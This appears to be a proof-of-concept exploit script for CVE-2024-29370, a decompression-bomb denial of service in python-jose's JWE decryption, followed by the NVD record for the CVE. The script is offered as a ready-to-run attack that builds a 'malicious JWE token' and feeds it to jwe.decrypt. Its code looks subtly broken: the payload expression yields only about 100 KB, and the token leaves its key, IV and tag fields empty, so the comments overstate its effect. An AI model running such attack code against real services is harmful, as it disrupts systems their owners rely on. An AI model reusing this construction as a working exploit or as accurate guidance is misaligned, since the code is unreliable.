CVE-2024-29370

#!/usr/bin/env python3 """ CVE-2024-29370 PoC - python-jose JWE Decompression DoS This PoC demonstrates the decompression bomb vulnerability in python-jose 3.3.0 """ from jose import jwe import base64 import zlib import json def create_decompression_bomb(): """ Create a malicious JWE token with high compression ratio The decompressed content can be extremely large (zip bomb style) """ # Create a small payload that expands massively when decompressed # Using repeated patterns that compress extremely well small_payload = b'{"data": "' + b'A' * 100000 + b'"}' * 10 # Compress the payload using DEFLATE compressed = zlib.compress(small_payload, level=9) # Create JWE structure with the compressed content # This follows the JWE standard format jwe_header = { "alg": "A128KW", "enc": "A128CBC-HS256", "zip": "DEF" # Enable compression } # Encode header header_b64 = base64.urlsafe_b64encode( json.dumps(jwe_header).encode() ).decode().rstrip('=') # The compressed content becomes the JWE ciphertext ciphertext_b64 = base64.urlsafe_b64encode(compressed).decode().rstrip('=') # Create the JWE token format jwe_token = f"{header_b64}....{ciphertext_b64}" return jwe_token def exploit(target_token): """ Attempt to decrypt the malicious JWE token This will cause high memory/CPU usage """ try: # This call may hang or crash due to decompression bomb plaintext = jwe.decrypt(target_token, 'secret-key') return plaintext except Exception as e: return f"Error: {e}" if __name__ == "__main__": print("[*] Generating malicious JWE token for CVE-2024-29370") bomb_token = create_decompression_bomb() print(f"[*] Token length: {len(bomb_token)} bytes") print("[*] Attempting to decrypt (may cause DoS)...") result = exploit(bomb_token) print(f"[*] Result: {result}")

{"cve": {"id": "CVE-2024-29370", "sourceIdentifier": "[email protected]", "published": "2025-12-17T16:16:04.457", "lastModified": "2026-01-05T15:14:48.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python-jose_project:python-jose:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89A29F0D-0CC6-4177-8E90-B192A39EB233"}]}]}], "references": [{"url": "https://github.com/mpdavis/python-jose/issues/344", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}